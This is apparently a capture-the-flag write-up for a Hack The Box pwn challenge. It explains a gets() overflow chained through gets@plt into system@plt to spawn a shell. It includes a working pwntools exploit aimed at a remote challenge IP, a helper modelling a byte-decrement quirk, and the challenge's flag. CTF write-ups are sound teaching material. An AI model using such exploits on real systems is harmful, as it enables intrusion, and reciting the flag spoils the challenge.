# Pwn - Sound of Silence

## Description

Navigate the shadows in a dimly lit room, silently evading detection as you strategize to outsmart your foes. Employ clever distractions to divert their attention, paving the way for your daring escape!

## Downloads

{% file src="/files/oSLYLSAwnE0twOResKWA" %}

## Solution

<figure><img src="/files/97XSQTm2RUxnar2tHBCx" alt=""><figcaption><p>Checksec</p></figcaption></figure>

Firstly, the binary has Full RELRO, so there are no GOT overwrites, and NX is enabled, which means we can't execute shellcode on the stack.

<figure><img src="/files/in2KJ5jFNulfF2kfZSAR" alt=""><figcaption><p>main()</p></figcaption></figure>

The program is relatively simple: it calls `system()` and `gets()`, but there is no 'win' function. To pwn this we likely need to get the program to execute `system('/bin/sh')`. ROPgadget did not find any gadget that could set `rdi`, which made the challenge a little tough. (After the event, someone noted that there is a `mov rdi, rax` gadget in the main function; interestingly, ROPgadget did not pick it up. We could have used that if we wanted to.)

<figure><img src="/files/tDoB4wRB3Y2FjQGFi4FY" alt=""><figcaption><p>The only gadget which is not so useful.</p></figcaption></figure>

But we don't actually need a ROP gadget. When `gets()` returns, `rdi` still points at the buffer it just filled with our input, so returning straight into `system()` afterwards passes our string as its argument. That makes this very easy.

Another interesting thing to note is that if we just pass "/bin/sh" to `gets()`, the 5th character (index 4) gets decremented by one: the '/' becomes a '.'.

<figure><img src="/files/Nul4kBNQUeIPMuvyUglS" alt=""><figcaption><p>'/bin/sh' became '/bin.sh'</p></figcaption></figure>

To overcome this we just send "/bin0sh" instead: '0' (0x30) decremented by one is '/' (0x2f), so the buffer ends up holding "/bin/sh" by the time `system()` sees it.
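As an added illustration (not part of the original writeup), the helper below models the observed quirk as a plain decrement of one byte at index 4 (an assumption inferred from '/' turning into '.'), computes the input to send for any command string and decremented position, and flags the bytes that can never be delivered through `gets()`.

```python
# Constructed example, not the writeup's code: model the quirk in which the
# binary decrements the 5th byte (index 4) of whatever gets() read, and
# compute the input that still yields the wanted string afterwards.
# The "decrement by one" model is an assumption based on '/' -> '.'.

NEWLINE = 0x0A  # gets() stops reading at '\n', so this byte can never arrive
NUL = 0x00      # would terminate the command string before system() sees it all


def apply_decrement(data: bytes, index: int = 4) -> bytes:
    """Simulate what the target does to the buffer: byte[index] -= 1 (mod 256)."""
    if index >= len(data):
        return data  # the decremented byte lies outside the string itself
    buf = bytearray(data)
    buf[index] = (buf[index] - 1) & 0xFF
    return bytes(buf)


def encode_for_decrement(target: bytes, index: int = 4) -> bytes:
    """Return the input that becomes `target` after the decrement at `index`.

    Raises ValueError when no deliverable input exists: the pre-image byte
    would have to be '\\n' (end of input for gets()) or NUL (string cut short).
    """
    if index >= len(target):
        raise ValueError("decremented byte lies outside the target string")
    wanted = (target[index] + 1) & 0xFF
    if wanted in (NEWLINE, NUL):
        raise ValueError(f"byte {target[index]:#04x} at index {index} cannot be produced")
    buf = bytearray(target)
    buf[index] = wanted
    encoded = bytes(buf)
    # Sanity check: the simulated transformation must give back the target.
    assert apply_decrement(encoded, index) == target
    return encoded


if __name__ == "__main__":
    print(apply_decrement(b"/bin/sh"))       # b'/bin.sh', what the debugger showed
    print(encode_for_decrement(b"/bin/sh"))  # b'/bin0sh', the string the exploit sends
```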

```python
from pwn import *

exe = './sound_of_silence'
elf = context.binary = ELF(exe, checksec=False)
# context.log_level = 'debug'

# Bytes from the start of the gets() buffer up to the saved return address.
offset = 40

# io = process(exe)
io = remote("94.237.63.93", 59792)

# Overwrite the return address with gets@plt: rdi still points at the stack
# buffer, so the next line we send is read into it. gets() then returns into
# system@plt with rdi unchanged, so system() runs the string we just supplied.
payload = b'A' * offset
payload += p64(elf.plt.gets)
payload += p64(elf.plt.system)

io.sendlineafter(b'>> ', payload)
# The binary decrements the 5th byte, so '0' becomes '/' and the buffer
# holds "/bin/sh" by the time system() is called.
io.sendline(b'/bin0sh')

io.interactive()
```

<figure><img src="/files/vtqpIW4p7aC0Jvh7PScO" alt=""><figcaption><p>Pwned</p></figcaption></figure>

Flag: `HTB{n0_n33d_4_l34k5_wh3n_u_h4v3_5y5t3m}`
